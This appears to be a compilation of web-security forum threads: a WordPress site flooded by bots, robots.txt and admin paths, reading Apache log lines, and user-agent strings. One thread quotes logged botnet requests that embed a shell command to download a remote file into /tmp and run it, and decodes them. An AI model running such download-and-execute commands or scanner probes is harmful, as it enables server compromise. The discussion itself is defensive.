Over the last few days I have noticed that my Wordpress website had been running quite slowly, so I decided to investigate. After checking my database I saw that a table which was responsible for tracking 404 errors was over 1GB is size. At this point it was evident I was being targeted by bots.
After checking my access log I could see that there was a pattern of sorts, the bot seemed to land on a legitimate page which listed my categories and then move into a category page and at this point they request seemingly random page numbers, many of which are non-existent pages causing the issue.
Example:
/watch-online/ - Landing Page
/category/evolution/page/7 - 404
/category/evolution/page/1
/category/evolution/page/3
/category/evolution/page/5 - 404
/category/evolution/page/8 - 404
/category/evolution/page/4 - 404
/category/evolution/page/2
/category/evolution/page/6 - 404
/category/evolution/page/9 - 404
/category/evolution/page/10 - 404
This is the actual order of requests and they all happen within a second, at this point the IP becomes blocked as too many 404's have been thrown but this seems to have no affect due to the sheer number of bots all doing the same thing.
Also the category changes with each bot so they are all attacking random categories and generating 404 pages.
At the moment there are 2037 unique ip's which have thrown similar 404s in the last 24 hours.
I also use Cloudflare and have manually blocked many ip's from ever reaching my box but this attack is relentless and it seems as though they keep generating new ip's. Here is a list of some offending ip's:
77.101.138.202
81.149.196.188
109.255.127.90
75.19.16.214
47.187.231.144
70.190.53.222
62.251.17.234
184.155.42.206
74.138.227.150
98.184.129.57
151.224.41.144
94.29.229.186
64.231.243.218
109.160.110.135
222.127.118.145
92.22.14.143
92.14.176.174
50.48.216.145
58.179.196.182
Other than automatically blocking ip's for too many 404 errors I can think of no other real solution and this in itself is quite ineffective due to the sheer number of ip's.
Any suggestions on how to deal with this would be greatly appreciated as there appears to be no end to this attack and my websites performance really is taking a hit.
Some User Agents Include:
Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.86 Safari/537.36
Mozilla/5.0 (Windows NT 6.2; rv:26.0) Gecko/20100101 Firefox/26.0
Mozilla/5.0 (compatible; MSIE
10.0; Windows NT 7.0; WOW64; Trident/6.0)
Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:22.0) Gecko/20100101
Firefox/22.0 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
If its your personal website, you can try checking cloudflare, which is free and also it can provide support against any ddos attacks.May be you can give a try.
Okay so after much searching, experimentation and head banging I have finally mitigated the attack.
The solution was to install the apache module 'mod_evasive' see:
https://www.digitalocean.com/community/tutorials/how-to-protect-against-dos-and-ddos-with-mod_evasive-for-apache-on-centos-7
So for any other poor soul that gets slammed as severally as I did have a look at that and get your thresholds finely tuned. This is a simple, cheap and very effective means of drastically downplaying any attack similar to the one I suffered.
My server is still getting bombarded by bots but this really does limit their damage.
Related
I use Wordpress on my site, recently I blocked a hacker that infected my site with A LOT of backdoors (thousands of backdoors, literally). I spend one and a half month to bet him. It wasn't my fault, the guy who was on my job before me never had updated the site.
After this, I noticed some strange access to files that just don't exist, and I think that the hacker is trying to find known exploits from wordpress plugins that I don't use. It is ok, I don't care at all. But one of those tries cought me attention.
95.249.95.104 - - [17/Jan/2020:10:17:29 -0300] "karin***com.br" "GET /shell?cd+/tmp;rm+-rf+.j;wget+http:/\x5C/91.92.66.124/..j/.j;chmod+777+.j;sh+.j;echo+DONE HTTP/1.1" 400 552 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36" "-"
94.200.107.2 - - [17/Jan/2020:13:52:28 -0300] "karin***com.br" "GET /shell?cd+/tmp;rm+-rf+.j;wget+http:/\x5C/91.92.66.124/..j/.j;chmod+777+.j;sh+.j;echo+DONE HTTP/1.1" 400 552 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36" "-"
197.226.122.184 - - [17/Jan/2020:14:57:36 -0300] "karin***com.br" "GET /shell?cd+/tmp;rm+-rf+.j;wget+http:/\x5C/91.92.66.124/..j/.j;chmod+777+.j;sh+.j;echo+DONE HTTP/1.1" 400 552 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36" "-"
I am hiding part of URL, sorry.
The IPs always change, even with consecutive requests with less than one second of difference, maybe a DDoS. The user-agent commonly change too, there are everything here: iPhone, iPad, Android, Windows 7, 8, 10, Firefox, Google Chrome, Internet Explorer... But Linux and Mac. Those 3 requests are the only exception.
I noticed that there are some shell commands at the URL. These ones:
cd /tmp;
rm -rf .j;
wget http://91.92.66.124/..j/.j;
chmod 777 .j;
sh .j;
echo DONE HTTP/1.1
There are no folder or file with this name on my /tmp directory.
This "karin" URL was an old site that doens't exist a long time. I don't know how he knows this URL, even I didn't knew. Everytime I try to access some URL that is configured on NGINX, but path doens't exist like this karin, I got a 404 error. But those tries given 400 error.
404 is normal, it is because there are nothing here. But 400? It means that there are something here, but it couldn't process the data sent. I removed the nginx configuration to this URL, and I tried it in other URLs. I alway got a 404 error, I tried this:
***.***.***.*** - - [17/Jan/2020:15:29:20 -0300] "joa***com.br" "GET /shell?cd+/var/www/html/conf;mkdir+teste HTTP/1.1" 404 555 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36" "-"
So my question is: Should I be scared of this commands returning a 400 error on this URL? Why I can't reproduce this? Aparently those tries failed, should I be sure that they failed? Which type of attack is this? I never heard about a "shell script injection by URL" like this.
It is an automatic scan made by scripts looking for web servers with bashdoor vulnerabilities.
You can, as a precaution, block all urls that contain words like shell. This type of scan is common and a webserver firewall can easily handle attack prevention.
This looks like a request from the Mozi Botnet, a botnet that searches for backdoor shells on IoT devices.
This may have been asked and answered, since I'm not sure what is the best way to phrase this.
I want to ensure that search spiders don't index the admin side of my website. Unfortunately, if I put the path into my robots.txt file, I'm handing over the cookie jar. Thankfully it's locked, though.
I've already had quite a few "visitors" who start by grabbing robots.txt. Obviously, non-legit spiders will ignore robots.txt, but I want to prevent Google and Bing from plastering my admin directory in search results.
My admin directory is not called "admin" (the most common SBO tactic)
Directory browsing is already blocked
Any IP who connects to my admin directory without logging in first with appropriate permissions is blacklisted. I have been monitoring, and have only had a couple of legit spiders get blacklisted by this manner
I'm using .htaccess (merging several public blacklists) and PHP blacklisting based on behaviors (some automatic, but still Mark-I eyeball as well)
All actions on the admin side are auth-based
The only links to the admin side are presented to authorized users with the appropriate permissions.
I'm not sure if I should put the admin directory in robots.txt - On one hand, legit spiders will ignore that directory, but on the other, I'm telling those who want to do harm that directory exists, and I don't want prying eyes...
I want to ensure that search spiders don't index the admin side of my website. Unfortunately, if I put the path into my robots.txt file, I'm handing over the cookie jar. Thankfully it's locked, though.
You rightly recognize the conundrum. If you put the admin url in the robots.txt, then well-behaved bots will stay away. On the other hand, you are basically telegraphing to bad folks where the soft spots are.
If you inspect your web server's access log, you will most likely see a LOT of requests for admin-type pages. For instance, looking at the apache log on one of my servers, I see opportunistic script kiddies searching for wordpress, phpmyadmin, etc:
109.98.109.101 - - [24/Jan/2019:08:48:36 -0600] "GET /wpc.php HTTP/1.1" 404 229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
109.98.109.101 - - [24/Jan/2019:08:48:36 -0600] "GET /wpo.php HTTP/1.1" 404 229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
109.98.109.101 - - [24/Jan/2019:08:48:37 -0600] "GET /wp-config.php HTTP/1.1" 404 229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
109.98.109.101 - - [24/Jan/2019:08:48:43 -0600] "POST /wp-admins.php HTTP/1.1" 404 229 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
109.98.109.101 - - [24/Jan/2019:08:50:01 -0600] "GET /wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php HTTP/1.1" 404 229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.108 Safari/537.36
109.98.109.101 - - [24/Jan/2019:08:48:39 -0600] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
109.98.109.101 - - [24/Jan/2019:08:48:39 -0600] "GET /phpmyadmin/scripts/db___.init.php HTTP/1.1" 404 229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
109.98.109.101 - - [24/Jan/2019:08:49:35 -0600] "GET /phpmyadmin/index.php HTTP/1.1" 404 229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.108 Safari/537.36"
109.98.109.101 - - [24/Jan/2019:08:49:47 -0600] "GET /admin/phpmyadmin/index.php HTTP/1.1" 404 229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.108 Safari/537.36"
109.98.109.101 - - [24/Jan/2019:08:49:47 -0600] "GET /admin/phpmyadmin2/index.php HTTP/1.1" 404 229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.108 Safari/537.36"
My access log has thousands upon thousands of these. Bots search for them all the time and none of these files are listed in my robots.txt file. As you might guess, unless you have an admin url that is really randomly named, the bad guys could very well guess its name is /admin.
I've already had quite a few "visitors" who start by grabbing robots.txt. Obviously, non-legit spiders will ignore robots.txt, but I want to prevent Google and Bing from plastering my admin directory in search results.
I'd strongly recommend spending some time banning bad bots or basically any bots that you have no use for. AHrefsBot & SemRushBot come to mind. It shouldn't be too hard to find bad bot lists but you'll need to evaluate any list you find to make sure it isn't blocking bots you want to serve. In addition to adding an exclusion rule to your robots.txt file, you should probably configure your application to ban bad bots by sending a 403 forbidden or 404 gone or other HTTP response code of your choice.
In the end, it's critical to remember the maxim that "security by obscurity is not security". One of the most important principles of encryption and security is Kerckhoff's Principle -- i.e., "the enemy knows the system." Your site should not not just rely on the location of your admin urls being obscure or secret. You must require authentication and use sound best practices in your authentication code. I would not rely on apache authentication but would instead code my web application to accept user login/password in a securely-hosted form (use HTTPS) and I would store only the hashed form of those passwords. Do not store cleartext passwords ever.
In the end, the security of your system is only as good as the weakest link. There is some value to having a unique or unusual admin because you might be exposed to fewer attacks, but this in itself doesn't provide any real security. If you still have reservations about broadcasting this url in your robots.txt file, perhaps weigh that against the problems you might expect if GoogleBot or BingBot or some other friendly bot starts stomping around in your admin urls. Would it bother you if these urls ended up in the google search index?
I've a website developed using PHP.
I encountered one major issue on my website, a security breach. So I checked the access logs of apache present at location "/var/log/apache2/access.log" on server.
I got following log which caused the error but I'm not able to understand what does each part of this log means. Can some one please give me step-by-step explanation of the below log?
70.39.61.42 - - [12/Jul/2015:17:05:12 +0000] "POST /user/register/javascript.void(0)/index.php?do=/user/register/ HTTP/1.1" 302 398 "http://www.mywebsite.com/user/register/javascript.void(0)" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36"
Actually this is the request which has created a major issue on my website. But I'm not able to figure out what parameters that request contained and what was the response, etc., etc.
Thanks in advance.
70.39.61.42
This is a IP address of someone who sent a request to your server
[12/Jul/2015:17:05:12 +0000]
This is a date when perpetrator did it
"POST /user/register/javascript.void(0)/index.php?do=/user/register/ HTTP/1.1"
This explains POST request was sent to your server to given URL
302 - This is a status code of the response - HTTP 302
398 - Indicates the size of the response sent
"http://www.mywebsite.com/user/register/javascript.void(0)"
This is a URL address of where the perpetrator came from
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36"
This is the user agent of the visitor.
In my computer with windows 8 and Google Chrome 35, the variable $_SERVER['HTTP_USER_AGENT'] sometimes returns
Mozilla/5.0 (Linux; U; Android 2.3.4; en-us; Kindle Fire HD Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1
when the correct value would be:
Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Why does it happen and how can I prevent it?
Kindle is both a hardware e-reader and a piece of software to read e-books on computers, laptops and tablets. Could it be that you installed that on your machine and that it nested itself in Chrome, like a plug-in/add-on?
If you're sure no such thing is the case, consider the suggestion by Alok in the comments. If you wouldn't know how to work with the console, check here whether the PHP- and JS-detected uAs read the same. If not, that would indeed be the cause.
Although I wouldn't know how to cure that then, other than by removing the (other) plug-ins/add-ons one by one.
When a search engine visits a webpage, what does get_browser() function and $_SERVER['HTTP_USER_AGENT'] return?
Also, what is the other possible evidence that PHP offers when a search engine crawls a webpage?
The get_browser() function attempts to determine the browser's features (in array) but dont count too much on it because of the non standard user-agents; instead, for a serious app, build your own.
the $_SERVER["HTTP_USER_AGENT"] is a long string "describing" the user's browser and can be used as first parameter in the above function (optional); A tip: use this one to uncover user's browser instead of get_browser() itself! Also be prepared for a missing user agent as well! An example of this string is this:
Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/418 (KHTML, like Gecko) Safari/417.9.3
a search engine or robot or spider or crawler that follows the rules will visit your page according to the information stored of robots.txt that must exist in your site's root.
Without a robots.txt a spider can crawl the whole site, as long as it find links inside your pages; if you have this file you can program it so to tell the spider what to search; NOTE: this rule applies only to "good" spiders and not the bad ones
get_browser() & $_SERVER['HTTP_USER_AGENT'] will return you the Useragents, it should look like this :
Google :
Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_1 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Version/4.0.5 Mobile/8B117 Safari/6531.22.7 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)
Googlebot-Image/1.0
Bing :
Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b
msnbot/2.0b (+http://search.msn.com/msnbot.htm)
msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)
Yahoo :
Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
-> To fully control (and limit) the crawl don't use robots.txt, use .htaccess or http.conf rules. (good crawler don't give a f*** about your disallow rules half of the time in robots.txt)